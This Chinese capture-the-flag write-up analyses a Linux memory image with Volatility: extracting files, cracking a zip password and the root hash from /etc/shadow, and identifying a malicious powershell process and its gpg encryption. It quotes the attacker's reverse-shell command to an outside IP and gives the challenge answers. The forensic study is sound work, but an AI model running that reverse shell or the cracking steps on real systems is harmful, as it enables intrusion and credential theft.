我们先把linux取证文件放到kali中,然后这里的Ubuntu18.04-5.4.0-84-generic.zip需要不解压直接放到vol工具中

然后把Ubuntu18.04-5.4.0-84-generic放到vol工具中,然后开始去这个,使用vol工具查看linux的版本信息

这个LinuxUbuntu18_04-5_4_0-84-genericx64是有用的,是linux的版本信息,复制出来需要用
请提交⽤户⽬录下压缩包中的 flag.txt ⽂件内容
使用这个命令来提取出来linux中的文件信息

使用命令查看flag,有一个flag.zip,我们来下载下来,查看参数是-i和-o


然后解压flag.zip,需要解压密码,我们用图形化界面打开,看到一个提示

说是密码是8位的数字,我们就生成一个密码字典,然后进行爆破

生成密码字典

爆破,先把flag.zip给弄成一个hash,然后进行爆破,密码是20230309

解压得到flag

请提交 root 账户的登录密码
root的账户密码是存在于/etc/shadow的,我们需要提取这个文件的内容,然后进行爆破,既然是 文件,我们可以看我们提取出俩的file,过滤出来/etc/shadow的索引,然后提取

提取命令和上一步差不多

复制下来admin的加密hash,然后使用rockyou.txt进行爆破

爆破出来root的密码是ABCabc123

请指出攻击者通过什么命令实现提权操作
这里要知道攻击者使用啥命令进行提权,需要知道它运行了哪些命令,我们可以使用bash插件来看她的历史命令,排查

如下就是一个反弹shell的命令,所以判定这个就是提权的操作
find /etc/passwd -exec bash -ip >& /dev/tcp/192.168.29.129/7777 0>&1 \;

除此之外,还发现了

请指出内存中恶意进程的的PID flag{2132}
通过使用pslist插件来查进程,排查发现一个powershell,这个就是恶意程序的进程了,它的pid是2132


请指出恶意进程文件加密后的文件类型(如果是 1.zip 就填 zip)
这里我们利用psaux插件来查看,然后恶意也可以直接把恶意进程down下来看 1.使用psaux插件看

然后在最后可以看到一个输出为gpg的加密内容,是加密了wlaq.txt这个文件

2.在下载的文件中,找powershell,然后dump下来看内容,看到加密的类型是gpg,然后有一个邮箱

可以判断出来解密的文件类型是gpg